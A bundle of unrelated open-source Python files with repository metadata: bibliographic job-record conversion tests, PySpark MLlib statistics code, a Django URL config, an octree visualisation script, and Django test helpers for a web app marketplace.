'$ref': 'http://localhost:5000/api/experiments/1108541',
},
},
]
result = jobs.do(create_record(snippet))
assert validate(result['experiments'], subschema) is None
assert expected == result['experiments']
def test_experiments_from_693__e__0_and_e():
schema = load_schema('jobs')
subschema = schema['properties']['experiments']
snippet = (
'<record>'
' <datafield tag="693" ind1=" " ind2=" ">'
' <subfield code="e">CERN-LHC-ATLAS</subfield>'
' <subfield code="0">1108541</subfield>'
' </datafield>'
' <datafield tag="693" ind1=" " ind2=" ">'
' <subfield code="e">IHEP-CEPC</subfield>'
' </datafield>'
'</record>'
) # record/1393583
expected = [
{
'curated_relation': True,
'name': 'CERN-LHC-ATLAS',
'record': {
'$ref': 'http://localhost:5000/api/experiments/1108541',
},
},
{
'curated_relation': False,
'name': 'IHEP-CEPC'
}
]
result = jobs.do(create_record(snippet))
assert validate(result['experiments'], subschema) is None
assert expected == result['experiments']
def test_experiments_from_triple_693__e__0():
schema = load_schema('jobs')
subschema = schema['properties']['experiments']
snippet = (
'<record>'
' <datafield tag="693" ind1=" " ind2=" ">'
' <subfield code="e">CERN-NA-049</subfield>'
' <subfield code="0">1110308</subfield>'
' </datafield>'
' <datafield tag="693" ind1=" " ind2=" ">'
' <subfield code="e">CERN-NA-061</subfield>'
' <subfield code="0">1108234</subfield>'
' </datafield>'
' <datafield tag="693" ind1=" " ind2=" ">'
' <subfield code="e">CERN-LHC-ALICE</subfield>'
' <subfield code="0">1110642</subfield>'
' </datafield>'
'</record>'
) # record/1469159
expected = [
{
'curated_relation': True,
'name': 'CERN-NA-049',
'record': {
'$ref': 'http://localhost:5000/api/experiments/1110308',
},
},
{
'curated_relation': True,
'name': 'CERN-NA-061',
'record': {
'$ref': 'http://localhost:5000/api/experiments/1108234',
},
},
{
'curated_relation': True,
'name': 'CERN-LHC-ALICE',
'record': {
'$ref': 'http://localhost:5000/api/experiments/1110642',
},
}
]
result = jobs.do(create_record(snippet))
assert validate(result['experiments'], subschema) is None
assert expected == result['experiments']
def test_institutions_from_110__a():
schema = load_schema('jobs')
subschema = schema['properties']['institutions']
snippet = (
'<datafield tag="110" ind1=" " ind2=" ">'
' <subfield code="a">Coll. William and Mary</subfield>'
'</datafield>'
) # record/1427342
expected = [
{
'curated_relation': False,
'name': 'Coll. William and Mary',
},
]
result = jobs.do(create_record(snippet))
assert validate(result['institutions'], subschema) is None
assert expected == result['institutions']
def test_institutions_from_double_110__a():
schema = load_schema('jobs')
subschema = schema['properties']['institutions']
snippet = (
'<record>'
' <datafield tag="110" ind1=" " ind2=" ">'
' <subfield code="a">Coll. William and Mary</subfield>'
' </datafield>'
' <datafield tag="110" ind1=" " ind2=" ">'
' <subfield code="a">Jefferson Lab</subfield>'
' </datafield>'
'</record>'
) # record/1427342
expected = [
{
'curated_relation': False,
'name': 'Coll. William and Mary',
},
{
'curated_relation': False,
'name': 'Jefferson Lab',
},
]
result = jobs.do(create_record(snippet))
assert validate(result['institutions'], subschema) is None
assert expected == result['institutions']
def test_institutions_from_110__double_a_z():
schema = load_schema('jobs')
subschema = schema['properties']['institutions']
snippet = (
'<datafield tag="110" ind1=" " ind2=" ">'
' <subfield code="a">Indiana U.</subfield>'
' <subfield code="a">NIST, Wash., D.C.</subfield>'
' <subfield code="z">902874</subfield>'
' <subfield code="z">903056</subfield>'
'</datafield>'
) # record/1328021
expected = [
{
'curated_relation': True,
'name': 'Indiana U.',
'record': {
'$ref': 'http://localhost:5000/api/institutions/902874',
},
},
{
'curated_relation': True,
'name': 'NIST, Wash., D.C.',
'record': {
'$ref': 'http://localhost:5000/api/institutions/903056',
},
},
]
result = jobs.do(create_record(snippet))
assert validate(result['institutions'], subschema) is None
assert expected == result['institutions']
def test_description_from_520__a():
schema = load_schema('jobs')
subschema = schema['properties']['description']
snippet = (
'<datafield tag="520" ind1=" " ind2=" ">'
' <subfield code="a">(1) Conduct independent research in string theory related theoretical sciences;<br /> <br /> (2) Advising graduate students in their research;<br /> <br /> (3) A very small amount of teaching of undergraduate courses.&nbsp;</subfield>'
'</datafield>'
) # record/1239755
expected = '(1) Conduct independent research in string theory related theoretical sciences;<br /> <br /> (2) Advising graduate students in their research;<br /> <br /> (3) A very small amount of teaching of undergraduate courses. '
result = jobs.do(create_record(snippet))
assert validate(result['description'], subschema) is None
assert expected == result['description']
def test_position_from_245__a():
schema = load_schema('jobs')
subschema = schema['properties']['position']
snippet = (
'<datafield tag="245" ind1=" " ind2=" ">'
' <subfield code="a">Neutrino Physics</subfield>'
'</datafield>'
) # record/1467312
expected = 'Neutrino Physics'
result = jobs.do(create_record(snippet))
assert validate(result['position'], subschema) is None
assert expected == result['position']
def test_ranks_from_marcxml_656_with_single_a():
schema = load_schema('jobs')
subschema = schema['properties']['ranks']
snippet = (
'<datafield tag="656" ind1=" " ind2=" ">'
' <subfield code="a">Senior</subfield>'
'</datafield>'
)
result = jobs.do(create_record(snippet))
assert validate(result['ranks'], subschema) is None
assert result['ranks'] == ['SENIOR']
def test_ranks_from_marcxml_656_with_double_a():
schema = load_schema('jobs')
subschema = schema['properties']['ranks']
snippet = (
'<datafield tag="656" ind1=" " ind2=" ">'
' <subfield code="a">Senior</subfield>'
' <subfield code="a">Junior</subfield>'
'</datafield>'
)
expected = [
'SENIOR',
'JUNIOR',
]
result = jobs.do(create_record(snippet))
assert validate(result['ranks'], subschema) is None
assert expected == result['ranks']
def test_ranks_from_marcxml_double_656():
schema = load_schema('jobs')
subschema = schema['properties']['ranks']
snippet = (
'<record>'
' <datafield tag="656" ind1=" " ind2=" ">'
' <subfield code="a">Senior</subfield>'
' </datafield>'
' <datafield tag="656" ind1=" " ind2=" ">'
' <subfield code="a">Junior</subfield>'
' </datafield>'
'</record>'
)
expected = [
'SENIOR',
'JUNIOR',
]
result = jobs.do(create_record(snippet))
assert validate(result['ranks'], subschema) is None
assert expected == result['ranks']
|
jacquerie/inspire-dojson
|
tests/test_jobs.py
|
Python
|
gpl-3.0
| 18,740
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time: 2017/6/7 下午9:50
# @Author: BlackMatrix
# @Site: https://github.com/blackmatrix7
# @File: __init__.py.py
# @Software: PyCharm
__author__ = 'blackmatix'
if __name__ == '__main__':
pass
|
blackmatrix7/apizen
|
app/demo/__init__.py
|
Python
|
apache-2.0
| 248
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Python package for statistical functions in MLlib.
"""
from pyspark import RDD
from pyspark.mllib.common import callMLlibFunc, JavaModelWrapper
from pyspark.mllib.linalg import Matrix, _convert_to_vector
from pyspark.mllib.regression import LabeledPoint
__all__ = ['MultivariateStatisticalSummary', 'ChiSqTestResult', 'Statistics']
class MultivariateStatisticalSummary(JavaModelWrapper):
"""
Trait for multivariate statistical summary of a data matrix.
"""
def mean(self):
return self.call("mean").toArray()
def variance(self):
return self.call("variance").toArray()
def count(self):
return self.call("count")
def numNonzeros(self):
return self.call("numNonzeros").toArray()
def max(self):
return self.call("max").toArray()
def min(self):
return self.call("min").toArray()
class ChiSqTestResult(JavaModelWrapper):
"""
:: Experimental ::
Object containing the test results for the chi-squared hypothesis test.
"""
@property
def method(self):
"""
Name of the test method
"""
return self._java_model.method()
@property
def pValue(self):
"""
The probability of obtaining a test statistic result at least as
extreme as the one that was actually observed, assuming that the
null hypothesis is true.
"""
return self._java_model.pValue()
@property
def degreesOfFreedom(self):
"""
Returns the degree(s) of freedom of the hypothesis test.
Return type should be Number(e.g. Int, Double) or tuples of Numbers.
"""
return self._java_model.degreesOfFreedom()
@property
def statistic(self):
"""
Test statistic.
"""
return self._java_model.statistic()
@property
def nullHypothesis(self):
"""
Null hypothesis of the test.
"""
return self._java_model.nullHypothesis()
def __str__(self):
return self._java_model.toString()
class Statistics(object):
@staticmethod
def colStats(rdd):
"""
Computes column-wise summary statistics for the input RDD[Vector].
:param rdd: an RDD[Vector] for which column-wise summary statistics
are to be computed.
:return: :class:`MultivariateStatisticalSummary` object containing
column-wise summary statistics.
>>> from pyspark.mllib.linalg import Vectors
>>> rdd = sc.parallelize([Vectors.dense([2, 0, 0, -2]),
... Vectors.dense([4, 5, 0, 3]),
... Vectors.dense([6, 7, 0, 8])])
>>> cStats = Statistics.colStats(rdd)
>>> cStats.mean()
array([ 4., 4., 0., 3.])
>>> cStats.variance()
array([ 4., 13., 0., 25.])
>>> cStats.count()
3L
>>> cStats.numNonzeros()
array([ 3., 2., 0., 3.])
>>> cStats.max()
array([ 6., 7., 0., 8.])
>>> cStats.min()
array([ 2., 0., 0., -2.])
"""
cStats = callMLlibFunc("colStats", rdd.map(_convert_to_vector))
return MultivariateStatisticalSummary(cStats)
@staticmethod
def corr(x, y=None, method=None):
"""
Compute the correlation (matrix) for the input RDD(s) using the
specified method.
Methods currently supported: I{pearson (default), spearman}.
If a single RDD of Vectors is passed in, a correlation matrix
comparing the columns in the input RDD is returned. Use C{method=}
to specify the method to be used for single RDD inout.
If two RDDs of floats are passed in, a single float is returned.
:param x: an RDD of vector for which the correlation matrix is to be computed,
or an RDD of float of the same cardinality as y when y is specified.
:param y: an RDD of float of the same cardinality as x.
:param method: String specifying the method to use for computing correlation.
Supported: `pearson` (default), `spearman`
:return: Correlation matrix comparing columns in x.
>>> x = sc.parallelize([1.0, 0.0, -2.0], 2)
>>> y = sc.parallelize([4.0, 5.0, 3.0], 2)
>>> zeros = sc.parallelize([0.0, 0.0, 0.0], 2)
>>> abs(Statistics.corr(x, y) - 0.6546537) < 1e-7
True
>>> Statistics.corr(x, y) == Statistics.corr(x, y, "pearson")
True
>>> Statistics.corr(x, y, "spearman")
0.5
>>> from math import isnan
>>> isnan(Statistics.corr(x, zeros))
True
>>> from pyspark.mllib.linalg import Vectors
>>> rdd = sc.parallelize([Vectors.dense([1, 0, 0, -2]), Vectors.dense([4, 5, 0, 3]),
... Vectors.dense([6, 7, 0, 8]), Vectors.dense([9, 0, 0, 1])])
>>> pearsonCorr = Statistics.corr(rdd)
>>> print str(pearsonCorr).replace('nan', 'NaN')
[[ 1. 0.05564149 NaN 0.40047142]
[ 0.05564149 1. NaN 0.91359586]
[ NaN NaN 1. NaN]
[ 0.40047142 0.91359586 NaN 1. ]]
>>> spearmanCorr = Statistics.corr(rdd, method="spearman")
>>> print str(spearmanCorr).replace('nan', 'NaN')
[[ 1. 0.10540926 NaN 0.4 ]
[ 0.10540926 1. NaN 0.9486833 ]
[ NaN NaN 1. NaN]
[ 0.4 0.9486833 NaN 1. ]]
>>> try:
... Statistics.corr(rdd, "spearman")
... print "Method name as second argument without 'method=' shouldn't be allowed."
... except TypeError:
... pass
"""
# Check inputs to determine whether a single value or a matrix is needed for output.
# Since it's legal for users to use the method name as the second argument, we need to
# check if y is used to specify the method name instead.
if type(y) == str:
raise TypeError("Use 'method=' to specify method name.")
if not y:
return callMLlibFunc("corr", x.map(_convert_to_vector), method).toArray()
else:
return callMLlibFunc("corr", x.map(float), y.map(float), method)
@staticmethod
def chiSqTest(observed, expected=None):
"""
:: Experimental ::
If `observed` is Vector, conduct Pearson's chi-squared goodness
of fit test of the observed data against the expected distribution,
or againt the uniform distribution (by default), with each category
having an expected frequency of `1 / len(observed)`.
(Note: `observed` cannot contain negative values)
If `observed` is matrix, conduct Pearson's independence test on the
input contingency matrix, which cannot contain negative entries or
columns or rows that sum up to 0.
If `observed` is an RDD of LabeledPoint, conduct Pearson's independence
test for every feature against the label across the input RDD.
For each feature, the (feature, label) pairs are converted into a
contingency matrix for which the chi-squared statistic is computed.
All label and feature values must be categorical.
:param observed: it could be a vector containing the observed categorical
counts/relative frequencies, or the contingency matrix
(containing either counts or relative frequencies),
or an RDD of LabeledPoint containing the labeled dataset
with categorical features. Real-valued features will be
treated as categorical for each distinct value.
:param expected: Vector containing the expected categorical counts/relative
frequencies. `expected` is rescaled if the `expected` sum
differs from the `observed` sum.
:return: ChiSquaredTest object containing the test statistic, degrees
of freedom, p-value, the method used, and the null hypothesis.
>>> from pyspark.mllib.linalg import Vectors, Matrices
>>> observed = Vectors.dense([4, 6, 5])
>>> pearson = Statistics.chiSqTest(observed)
>>> print pearson.statistic
0.4
>>> pearson.degreesOfFreedom
2
>>> print round(pearson.pValue, 4)
0.8187
>>> pearson.method
u'pearson'
>>> pearson.nullHypothesis
u'observed follows the same distribution as expected.'
>>> observed = Vectors.dense([21, 38, 43, 80])
>>> expected = Vectors.dense([3, 5, 7, 20])
>>> pearson = Statistics.chiSqTest(observed, expected)
>>> print round(pearson.pValue, 4)
0.0027
>>> data = [40.0, 24.0, 29.0, 56.0, 32.0, 42.0, 31.0, 10.0, 0.0, 30.0, 15.0, 12.0]
>>> chi = Statistics.chiSqTest(Matrices.dense(3, 4, data))
>>> print round(chi.statistic, 4)
21.9958
>>> data = [LabeledPoint(0.0, Vectors.dense([0.5, 10.0])),
... LabeledPoint(0.0, Vectors.dense([1.5, 20.0])),
... LabeledPoint(1.0, Vectors.dense([1.5, 30.0])),
... LabeledPoint(0.0, Vectors.dense([3.5, 30.0])),
... LabeledPoint(0.0, Vectors.dense([3.5, 40.0])),
... LabeledPoint(1.0, Vectors.dense([3.5, 40.0])),]
>>> rdd = sc.parallelize(data, 4)
>>> chi = Statistics.chiSqTest(rdd)
>>> print chi[0].statistic
0.75
>>> print chi[1].statistic
1.5
"""
if isinstance(observed, RDD):
if not isinstance(observed.first(), LabeledPoint):
raise ValueError("observed should be an RDD of LabeledPoint")
jmodels = callMLlibFunc("chiSqTest", observed)
return [ChiSqTestResult(m) for m in jmodels]
if isinstance(observed, Matrix):
jmodel = callMLlibFunc("chiSqTest", observed)
else:
if expected and len(expected) != len(observed):
raise ValueError("`expected` should have same length with `observed`")
jmodel = callMLlibFunc("chiSqTest", _convert_to_vector(observed), expected)
return ChiSqTestResult(jmodel)
def _test():
import doctest
from pyspark import SparkContext
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest', batchSize=2)
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
powerlim2/python
|
Spark/pyspark/mllib/stat.py
|
Python
|
mit
| 11,597
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'profile/(?P<user_pk>\d+)/$', views.view_profile, name='profile'),
]
|
Jaxkr/TruthBot.org
|
Truthbot/contributors/urls.py
|
Python
|
gpl-2.0
| 149
|
import ocl as cam
import camvtk
import time
import vtk
import math
import datetime
red= (1,0,0)
green= (0,1,0)
blue= (0,0,1)
cyan= (0,1,1)
yellow= (1,1,0)
pink = ( float(255)/255,float(192)/255,float(203)/255)
grey = ( float(127)/255,float(127)/255,float(127)/255)
orange = ( float(255)/255,float(165)/255,float(0)/255)
#OCType = Enum('black', 'grey', 'white')
OCTMax = 8
def buildOCTree(volume, nodecenter=cam.Point(0,0,0), level=0):
# build octree of volume, return root node
node = OCTNode( level, center = nodecenter , type = 1, childlist=None)
flags = []
for n in xrange(0,9): # test all points
flags.append( volume.isInside( node.nodePoint(n) ) )
if (sum(flags) == 0): # nothing is inside
node.type = 0
#print "nothing inside!"
return node
if (sum(flags) == 9): # everything is inside
node.type = 2
#print "all inside!"
return node
if level== OCTMax: # reached max levels
return node #OCTNode(level, center= nodecenter, type = 2, childlist = None)
# have to subdivide:
childs = []
child_centers = []
for n in xrange(1,9):
child_center = node.childCenter(n)
childs.append( buildOCTree( volume , nodecenter = child_center, level= level+1) )
node.setChildren(childs)
return node
def searchOCTree(node, list):
# return list of nodes in the whole tree starting at node
if node.children is not None:
for chi in node.children:
searchOCTree(chi, list)
else:
list.append(node)
class Volume():
def __init__(self):
self.center = cam.Point(0,0,0)
self.radius = 0.45
def isInside(self, point):
p = point - self.center
if p.norm() < self.radius:
return 1
else:
return 0
def nodeColor(oct):
offset = 2
n = oct.level-offset
return (float(n)/(OCTMax-offset), float(OCTMax-offset - n)/(OCTMax-offset), 0)
def drawNode(myscreen, node):
if node.type == cam.OCType.BLACK:
return # don't draw intermediate nodes
if node.type == cam.OCType.GREY:
return # don't draw intermediate nodes
p = []
for n in xrange(1,9):
p1 = node.nodePoint(n)
p.append(p1)
lines = []
lines.append ( camvtk.Line(p1=(p[0].x,p[0].y,p[0].z),p2=(p[1].x,p[1].y,p[1].z)) )
lines.append ( camvtk.Line(p1=(p[0].x,p[0].y,p[0].z),p2=(p[2].x,p[2].y,p[2].z)) )
lines.append ( camvtk.Line(p1=(p[0].x,p[0].y,p[0].z),p2=(p[3].x,p[3].y,p[3].z)) )
lines.append ( camvtk.Line(p1=(p[2].x,p[2].y,p[2].z),p2=(p[4].x,p[4].y,p[4].z)) )
lines.append ( camvtk.Line(p1=(p[1].x,p[1].y,p[1].z),p2=(p[5].x,p[5].y,p[5].z)) )
lines.append ( camvtk.Line(p1=(p[1].x,p[1].y,p[1].z),p2=(p[6].x,p[6].y,p[6].z)) )
lines.append ( camvtk.Line(p1=(p[2].x,p[2].y,p[2].z),p2=(p[6].x,p[6].y,p[6].z)) )
lines.append ( camvtk.Line(p1=(p[6].x,p[6].y,p[6].z),p2=(p[7].x,p[7].y,p[7].z)) )
lines.append ( camvtk.Line(p1=(p[4].x,p[4].y,p[4].z),p2=(p[7].x,p[7].y,p[7].z)) )
lines.append ( camvtk.Line(p1=(p[4].x,p[4].y,p[4].z),p2=(p[3].x,p[3].y,p[3].z)) )
lines.append ( camvtk.Line(p1=(p[5].x,p[5].y,p[5].z),p2=(p[3].x,p[3].y,p[3].z)) )
lines.append ( camvtk.Line(p1=(p[5].x,p[5].y,p[5].z),p2=(p[7].x,p[7].y,p[7].z)) )
if node.type == cam.OCType.WHITE:
color = nodeColor(node)
if node.type == cam.OCType.GREY:
color = camvtk.white
if node.type == cam.OCType.BLACK:
color = camvtk.grey
for li in lines:
li.SetColor( color )
if node.type==cam.OCType.BLACK:
li.SetOpacity(0.1)
if node.type==cam.OCType.GREY:
li.SetOpacity(0.2)
myscreen.addActor(li)
def drawNode2(myscreen, node):
if node.type == cam.OCType.BLACK:
return # don't draw intermediate nodes
if node.type == cam.OCType.GREY:
return # don't draw intermediate nodes
p = []
for n in xrange(1,9):
p1 = node.nodePoint(n)
p.append(p1)
lines = []
for n in xrange(0,8):
lines.append ( camvtk.Point(center=(p[n].x,p[n].y,p[n].z) ) )
if node.type == cam.OCType.WHITE:
color = nodeColor(node)
if node.type == cam.OCType.GREY:
color = camvtk.white
if node.type == cam.OCType.BLACK:
color = camvtk.grey
for li in lines:
li.SetColor( color )
if node.type==cam.OCType.BLACK:
li.SetOpacity(0.1)
if node.type==cam.OCType.GREY:
li.SetOpacity(0.2)
myscreen.addActor(li)
def drawNode3(myscreen, node):
if node.type == cam.OCType.BLACK:
return # don't draw intermediate nodes
if node.type == cam.OCType.GREY:
return # don't draw intermediate nodes
if node.type == cam.OCType.WHITE:
ccolor = nodeColor(node)
if node.type == cam.OCType.GREY:
ccolor = camvtk.white
if node.type == cam.OCType.BLACK:
ccolor = camvtk.grey
cen = node.nodePoint(0)
cube = camvtk.Cube(center=(cen.x, cen.y, cen.z), length= node.scale, color=camvtk.green)
#cube.SetWireframe()
#cube.SetOpacity(0.2)
myscreen.addActor( cube )
def drawOCT(myscreen, oct, color, opacity=1.0):
nodes = oct.get_white_nodes()
for node in nodes:
cen = node.nodePoint(0)
cube = camvtk.Cube(center=(cen.x, cen.y, cen.z), length= node.scale, color=color)
cube.SetOpacity(opacity)
#cube.SetWireframe()
myscreen.addActor( cube )
if __name__ == "__main__":
#exit()
#oct = cam.OCTNode()
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(20, 12, 2)
myscreen.camera.SetFocalPoint(0,0, 0)
#print oct.str()
"""
print "max scale=", oct.get_max_scale()
for n in xrange(0,9):
p1 = oct.nodePoint(n)
myscreen.addActor( camvtk.Sphere(center=(p1.x, p1.y, p1.z), radius=0.1, color=camvtk.red))
print "id=%i" % (n),
print p1.str()
print "child centers:"
for n in xrange(1,9):
p1 = oct.childCenter(n)
myscreen.addActor( camvtk.Sphere(center=(p1.x, p1.y, p1.z), radius=0.1, color=camvtk.yellow))
print "id=%i" % (n),
print p1.str()
"""
xar = camvtk.Arrow(color=red, rotXYZ=(0,0,0))
myscreen.addActor(xar)
yar = camvtk.Arrow(color=green, rotXYZ=(0,0,90))
myscreen.addActor(yar)
zar = camvtk.Arrow(color=blue, rotXYZ=(0,-90,0))
myscreen.addActor(zar)
oc2 = cam.OCTest()
oc2.set_max_depth(5)
svol = cam.SphereOCTVolume()
svol.radius=3.1415
svol.center = cam.Point(-1,2,-1)
oc2.setVol(svol)
oc2.build_octree()
oc3 = cam.OCTest()
svol3 = cam.SphereOCTVolume()
svol3.radius=2
svol3.center = cam.Point(-1,2,1)
cvol = cam.CubeOCTVolume()
cvol.side = 3
cvol.center = cam.Point(2.0,2,-1)
oc3.setVol(cvol)
oc3.set_max_depth(5)
oc3.build_octree()
iters = oc3.prune_all()
iters = oc2.prune_all()
nlist = oc2.get_all_nodes()
print " oc2 got ", len(nlist), " nodes"
nlist = oc2.get_white_nodes()
print " oc2 got ", len(nlist), " white nodes"
nlist = oc3.get_all_nodes()
print " oc3 got ", len(nlist), " nodes"
print "calling balance"
oc2.balance(oc3)
print "after balance:"
nlist = oc2.get_all_nodes()
print " oc2 got ", len(nlist), " nodes"
nlist = oc2.get_white_nodes()
print " oc2 got ", len(nlist), " white nodes"
print "calling diff"
oc2.diff(oc3)
print "after diff:"
nlist = oc2.get_all_nodes()
print " oc2 got ", len(nlist), " nodes"
nlist = oc2.get_white_nodes()
print " oc2 got ", len(nlist), " white nodes"
drawOCT(myscreen, oc2, camvtk.green)
#drawOCT(myscreen, oc3, camvtk.red, opacity=0.1)
#exit()
#for node in nlist2:
# pass
#print node.str()
#p1 = node.nodePoint(0)
# drawNode3( myscreen, node )
#myscreen.addActor( camvtk.Sphere(center=(p1.x, p1.y, p1.z), radius=0.1, color=sph_color))
myscreen.render()
myscreen.iren.Start()
exit()
#oct = OCTNode(level=0)
testvol = Volume()
print "building tree...",
tree = buildOCTree(testvol)
print "done."
print tree
list =[]
searchOCTree(tree, list)
print len(list), " nodes in tree"
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
w2if.Modified()
t = camvtk.Text()
t.SetPos( (myscreen.width-200, myscreen.height-30) )
myscreen.addActor( t)
t2 = camvtk.Text()
t2.SetPos( (myscreen.width-200, 30) )
myscreen.addActor( t2)
n = 0
for node in list:
addNodes(myscreen, node)
if (n%50) == 0:
nodetext = "Nodes: %5i" % (n)
t2.SetText(nodetext)
t.SetText("OpenCAMLib 10.03-beta " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
myscreen.render()
myscreen.camera.Azimuth( 3 )
print "frame %i of %i" % (n, len(list))
w2if.Modified()
lwr.SetFileName("frames/oct"+ ('%05d' % n)+".png")
#lwr.Write()
n = n +1
#time.sleep(0.1)
print "done!"
#raw_input("Press Enter to terminate")
|
AlanZatarain/opencamlib
|
src/attic/oct_test3.py
|
Python
|
gpl-3.0
| 9,669
|
import json
import os
import random
import time
from contextlib import contextmanager
from datetime import datetime, timedelta
from decimal import Decimal
from functools import partial
from urlparse import SplitResult, urlsplit, urlunsplit
from django import forms, test
from django.db import connections, transaction, DEFAULT_DB_ALIAS
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core.cache import cache
from django.core.files.storage import default_storage as storage
from django.core.management import call_command
from django.core.urlresolvers import reverse
from django.test.client import Client, RequestFactory
from django.utils import translation
from django.utils.translation import trans_real
import elasticsearch
import mock
import tower
from dateutil.parser import parse as dateutil_parser
from django_browserid.tests import mock_browserid
from nose.exc import SkipTest
from nose.tools import eq_
from pyquery import PyQuery as pq
from waffle import cache_sample, cache_switch
from waffle.models import Flag, Sample, Switch
import mkt
from lib.es.management.commands import reindex
from lib.post_request_task import task as post_request_task
from mkt.access.acl import check_ownership
from mkt.access.models import Group, GroupUser
from mkt.constants import regions
from mkt.constants.payments import PROVIDER_REFERENCE
from mkt.files.helpers import copyfileobj
from mkt.prices.models import AddonPremium, Price, PriceCurrency
from mkt.search.indexers import BaseIndexer
from mkt.site.fixtures import fixture
from mkt.site.utils import app_factory
from mkt.translations.hold import clean_translations
from mkt.translations.models import Translation
from mkt.users.models import UserProfile
from mkt.webapps.models import Webapp
# We might now have gettext available in jinja2.env.globals when running tests.
# It's only added to the globals when activating a language with tower (which
# is usually done in the middlewares). During tests, however, we might not be
# running middlewares, and thus not activating a language, and thus not
# installing gettext in the globals, and thus not have it in the context when
# rendering templates.
tower.activate('en-us')
class DynamicBoolFieldsTestMixin():
def setUp(self):
"""
Create an instance of the DynamicBoolFields model and call super
on the inheriting setUp.
(e.g. RatingDescriptors.objects.create(addon=self.app))
"""
self.app = app_factory()
self.model = None
self.related_name = '' # Related name of the bool table on the Webapp.
self.BOOL_DICT = []
self.flags = [] # Flag names.
self.expected = [] # Translation names.
def _get_related_bool_obj(self):
return getattr(self.app, self.related_name)
def _flag(self):
"""Flag app with a handful of flags for testing."""
self._get_related_bool_obj().update(
**dict(('has_%s' % f.lower(), True) for f in self.flags))
def _check(self, obj=None):
if not obj:
obj = self._get_related_bool_obj()
for bool_name in self.BOOL_DICT:
field = 'has_%s' % bool_name.lower()
value = bool_name in self.flags
if isinstance(obj, dict):
eq_(obj[field], value,
u'Unexpected value for field: %s' % field)
else:
eq_(getattr(obj, field), value,
u'Unexpected value for field: %s' % field)
def to_unicode(self, items):
"""
Force unicode evaluation of lazy items in the passed list, for set
comparison to a list of already-evaluated unicode strings.
"""
return [unicode(i) for i in items]
def test_bools_set(self):
self._flag()
self._check()
def test_to_dict(self):
self._flag()
self._check(self._get_related_bool_obj().to_dict())
def test_default_false(self):
obj = self.model(addon=self.app)
eq_(getattr(obj, 'has_%s' % self.flags[0].lower()), False)
def formset(*args, **kw):
"""
Build up a formset-happy POST.
*args is a sequence of forms going into the formset.
prefix and initial_count can be set in **kw.
"""
prefix = kw.pop('prefix', 'form')
total_count = kw.pop('total_count', len(args))
initial_count = kw.pop('initial_count', len(args))
data = {prefix + '-TOTAL_FORMS': total_count,
prefix + '-INITIAL_FORMS': initial_count}
for idx, d in enumerate(args):
data.update(('%s-%s-%s' % (prefix, idx, k), v)
for k, v in d.items())
data.update(kw)
return data
def initial(form):
"""Gather initial data from the form into a dict."""
data = {}
for name, field in form.fields.items():
if form.is_bound:
data[name] = form[name].data
else:
data[name] = form.initial.get(name, field.initial)
# The browser sends nothing for an unchecked checkbox.
if isinstance(field, forms.BooleanField):
val = field.to_python(data[name])
if not val:
del data[name]
return data
def check_links(expected, elements, selected=None, verify=True):
"""Useful for comparing an `expected` list of links against PyQuery
`elements`. Expected format of links is a list of tuples, like so:
[
('Home', '/'),
('Extensions', reverse('browse.extensions')),
...
]
If you'd like to check if a particular item in the list is selected,
pass as `selected` the title of the link.
Links are verified by default.
"""
for idx, item in enumerate(expected):
# List item could be `(text, link)`.
if isinstance(item, tuple):
text, link = item
# Or list item could be `link`.
elif isinstance(item, basestring):
text, link = None, item
e = elements.eq(idx)
if text is not None:
eq_(e.text(), text)
if link is not None:
# If we passed an <li>, try to find an <a>.
if not e.filter('a'):
e = e.find('a')
eq_(e.attr('href'), link)
if verify and link != '#':
eq_(Client().head(link, follow=True).status_code, 200,
'%r is dead' % link)
if text is not None and selected is not None:
e = e.filter('.selected, .sel') or e.parents('.selected, .sel')
eq_(bool(e.length), text == selected)
class _JSONifiedResponse(object):
def __init__(self, response):
self._orig_response = response
def __getattr__(self, n):
return getattr(self._orig_response, n)
def __getitem__(self, n):
return self._orig_response[n]
def __iter__(self):
return iter(self._orig_response)
@property
def json(self):
"""Will return parsed JSON on response if there is any."""
if self.content and 'application/json' in self['Content-Type']:
if not hasattr(self, '_content_json'):
self._content_json = json.loads(self.content)
return self._content_json
class JSONClient(Client):
def _with_json(self, response):
if hasattr(response, 'json'):
return response
else:
return _JSONifiedResponse(response)
def get(self, *args, **kw):
return self._with_json(super(JSONClient, self).get(*args, **kw))
def delete(self, *args, **kw):
return self._with_json(super(JSONClient, self).delete(*args, **kw))
def post(self, *args, **kw):
return self._with_json(super(JSONClient, self).post(*args, **kw))
def put(self, *args, **kw):
return self._with_json(super(JSONClient, self).put(*args, **kw))
def patch(self, *args, **kw):
return self._with_json(super(JSONClient, self).patch(*args, **kw))
def options(self, *args, **kw):
return self._with_json(super(JSONClient, self).options(*args, **kw))
ES_patchers = [mock.patch('elasticsearch.Elasticsearch'),
mock.patch('mkt.websites.indexers.WebsiteIndexer', spec=True),
mock.patch('mkt.webapps.indexers.WebappIndexer', spec=True),
mock.patch('mkt.search.indexers.index', spec=True),
mock.patch('mkt.search.indexers.BaseIndexer.unindex'),
mock.patch('mkt.search.indexers.Reindexing', spec=True,
side_effect=lambda i: [i]),
]
def start_es_mock():
for patch in ES_patchers:
patch.start()
def stop_es_mock():
for patch in ES_patchers:
patch.stop()
# Reset cached Elasticsearch objects.
BaseIndexer._es = {}
def days_ago(days):
return datetime.now().replace(microsecond=0) - timedelta(days=days)
class MockEsMixin(object):
mock_es = True
@classmethod
def setUpClass(cls):
if cls.mock_es:
start_es_mock()
